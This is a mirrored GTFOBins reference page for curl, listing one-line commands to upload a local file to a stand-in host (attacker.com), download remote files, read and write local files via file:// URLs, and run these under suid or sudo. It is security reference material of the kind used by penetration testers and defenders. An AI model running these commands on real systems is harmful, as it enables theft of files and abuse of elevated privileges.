GTFOBins.github.io/curl.md at 41d9312c53dbd84a30cf7a20bd186047e3179bcc - GTFOBins.github.io - git.dotya.ml

mirror/GTFOBins.github.io

mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00

LinuxSploit 41d9312c53

Add curl file-write

2021-04-11 12:10:42 +02:00

1.3 KiB

Raw Blame History

functions

file-upload

file-download

file-read

file-write

suid

sudo

description	code
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.	URL=http://attacker.com/ LFILE=file_to_send curl -X POST -d @$file_to_send $URL

description	code
Fetch a remote file via HTTP GET request.	URL=http://attacker.com/file_to_get LFILE=file_to_save curl $URL -o $LFILE

description	code
The file path must be absolute.	LFILE=/tmp/file_to_read curl file://$LFILE

description	code
The file path must be absolute.	LFILE=file_to_write TF=$(mktemp) echo DATA >$TF curl "file://$TF" -o "$LFILE"

description	code
Fetch a remote file via HTTP GET request.	URL=http://attacker.com/file_to_get LFILE=file_to_save ./curl $URL -o $LFILE

description	code
Fetch a remote file via HTTP GET request.	URL=http://attacker.com/file_to_get LFILE=file_to_save sudo curl $URL -o $LFILE